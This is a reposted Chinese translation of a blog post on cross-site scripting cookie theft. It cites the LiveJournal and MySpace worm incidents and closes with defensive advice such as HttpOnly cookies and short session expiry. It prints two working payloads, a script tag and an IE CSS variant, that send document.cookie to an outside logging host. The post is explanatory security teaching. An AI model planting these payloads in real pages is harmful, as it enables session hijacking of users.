XSS之竊取Cookie-創(chuàng)新互聯(lián)

譯者按: 10年前的博客似乎有點老了,但是**XSS*****的威脅依然還在,我們不得不防。

創(chuàng)新互聯(lián)自2013年創(chuàng)立以來,是專業(yè)互聯(lián)網(wǎng)技術服務公司,擁有項目網(wǎng)站設計制作、網(wǎng)站建設網(wǎng)站策劃,項目實施與項目整合能力。我們以讓每一個夢想脫穎而出為使命,1280元樂業(yè)做網(wǎng)站,已為上家服務,為樂業(yè)各地企業(yè)和個人服務,聯(lián)系電話:18980820575

  • 原文: XSS - Stealing Cookies 101

  • 譯者: Fundebug

為了保證可讀性,本文采用意譯而非直譯。另外,本文版權歸原作者所有,翻譯僅用于學習。

竊取Cookie是非常簡單的,因此不要輕易相信客戶端所聲明的身份。即便這個Cookie是在數(shù)秒之前驗證過,那也未必是真的,尤其當你僅使用Cookie驗證客戶端的時候。

2006年1月,LiveJournal遭到了**XSS*****,這個事件足以警示我們。還有,2006年10月,MySapce也遭到了**XSS*****,這告訴我們必須非常謹慎地過濾用戶發(fā)布的文本,因為*可以在文本中摻雜一些JavaScript代碼,以此竊取登陸用戶的Cookie**。

正如****LiveJournal那樣,你不需要在登陸用戶的瀏覽器進行任何操作,而可以在第三方進行所有操作。更糟糕的是,竊取Cookie事實上操作起來非常簡單,但是防范起來卻非常困難**。

下面的的JavaScript代碼就可以竊取Cookie,是不是很簡單?

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

如果我可以將這段代碼插入到某個登陸用戶的頁面,則Cookie就會通過HTTP請求發(fā)送給我,然后我就可以偽造那個可憐的登陸用戶了!

在IE瀏覽器上,可以通過在CSS代碼中執(zhí)行JavaScript來竊取Cookie,也很簡單。

<style>
.getcookies{
    background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>

如果你對用戶發(fā)布的文本內(nèi)容不進行嚴格的過濾的話,*就可以很方便地竊取Cookie。是不是很可怕?如果你是一個負責任的開發(fā)者的話,你就應該保持警惕!因此,你必須假設所有用戶的Cookie都被竊取了。注意,是所有用戶**,對于這一點,我不想含糊其辭。

為了保證安全:請不停地重設session的重設;將過期時間設置短一些;監(jiān)控referreruserAgent的值;使用HttpOnly禁止腳本讀取Cookie。這些措施并非萬無一失,但是增加了***的難度,因此也是有效的。

如果你對MySapce遭到的**XSS*****不了解,可以查看*本人公開的技術細節(jié),很有趣,不過切勿模仿,因為他為自己的行為此付出了不小的代價:三年內(nèi)被禁止使用電腦!**。

參考鏈接

  • 9.3 避免XSS***
  • 薩米 (計算機蠕蟲)
  • Technical explanation of The MySpace Worm
  • Account Hijackings Force LiveJournal Changes

關于Fundebug

Fundebug專注于JavaScript、微信小程序、微信小游戲、支付寶小程序、React Native、Node.js和Java實時BUG監(jiān)控。 自從2016年雙十一正式上線,F(xiàn)undebug累計處理了7億+錯誤事件,得到了Google、360、金山軟件、百姓網(wǎng)等眾多知名用戶的認可。歡迎免費試用!

XSS之竊取Cookie

版權聲明

轉載時請注明作者Fundebug以及本文地址:
https://blog.fundebug.com/2017/08/16/xss_steal_cookie/

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。

分享題目:XSS之竊取Cookie-創(chuàng)新互聯(lián)
標題URL:http://muchs.cn/article36/cdcepg.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供靜態(tài)網(wǎng)站、做網(wǎng)站、建站公司網(wǎng)頁設計公司、ChatGPT全網(wǎng)營銷推廣

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

成都做網(wǎng)站